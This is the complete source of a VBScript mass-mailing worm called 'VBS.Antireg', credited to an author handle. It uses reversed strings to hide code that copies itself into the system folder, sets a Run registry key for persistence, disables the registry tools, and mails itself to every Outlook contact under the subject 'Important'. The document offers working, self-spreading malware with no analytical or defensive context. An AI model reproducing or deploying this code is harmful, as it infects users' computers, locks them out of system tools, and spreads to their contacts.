'~~ VBS.Antireg by sevenC / N0:7 ~~
'http://trax.to/sevenC
'sevenC_zone@yahoo.com
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Set jslxvslx=CreateObject("Scripting.FileSystemObject")
Set xxvsnbdg=CreateObject("WScript.Shell")
z = strreverse(")emaNlluFtpircS.tpircSW(eliFteG.xlsvxlsj=ypc teS")
execute(z)
cpy.Copy(jslxvslx.GetSpecialFolder(1)&"\Copy.vbs")
r=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\kjhik")
xxvsnbdg.RegWrite r,(jslxvslx.GetSpecialFolder(1)&"\Copy.vbs")
xxvsnbdg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
if day(now) = 1 and month(now) = 1 then
msgbox "Happy New year....by sevenC",vbinformation,"sucke"
end if
x = chr(34)
a = strreverse(")" + x + "noitacilppA.kooltuO" + x + "(tcejbOetaerC=lsvkdbng teS")
execute(a)
b = strreverse(")" + x + "IPAM" + x + "(ecapSemaNteG.lsvkdbng=svxlsvxl teS")
execute(b)
c = strreverse("stsiLsserddA.svxlsvxl nI C hcaE roF")
execute(c)
d = strreverse("nehT 0 >< tnuoC.seirtnEsserddA.C fI")
execute(d)
e = strreverse("tnuoC.seirtnEsserddA.C oT 1=D roF")
execute(e)
f = strreverse(")D(seirtnEsserddA.C=dbngdbns teS")
execute(f)
g = strreverse(")0(metIetaerC.lsvkdbng=ohbngdnd teS")
execute(g)
h = strreverse("sserddA.dbngdbns=oT.ohbngdnd")
execute(h)
i = strreverse(x + "tnatropmI" + x + "=tcejbuS.ohbngdnd")
execute(i)
j = strreverse(x + "raey wen yppaH" + x + "=ydoB.ohbngdnd")
execute(j)
k = strreverse(")" + x + "sbv.ypoC\" + x +"&)1(redloFlaicepSteG.xlsvxlsj(ddA.stnemhcattA.ohbngdnd")
execute(k)
l = strreverse("eurT=timbuSretfAeteleD.ohbngdnd")
execute(l)
m = strreverse("nehT " + x + x + " >< oT.ohbngdnd fI")
execute(m)
n = strreverse("dneS.ohbngdnd")
execute(n)
o = strreverse("fI dnE")
execute(o)
p = strreverse("txeN")
execute(p)
q = strreverse("fI dnE")
execute(q)
r = strreverse("txeN")
execute(r)
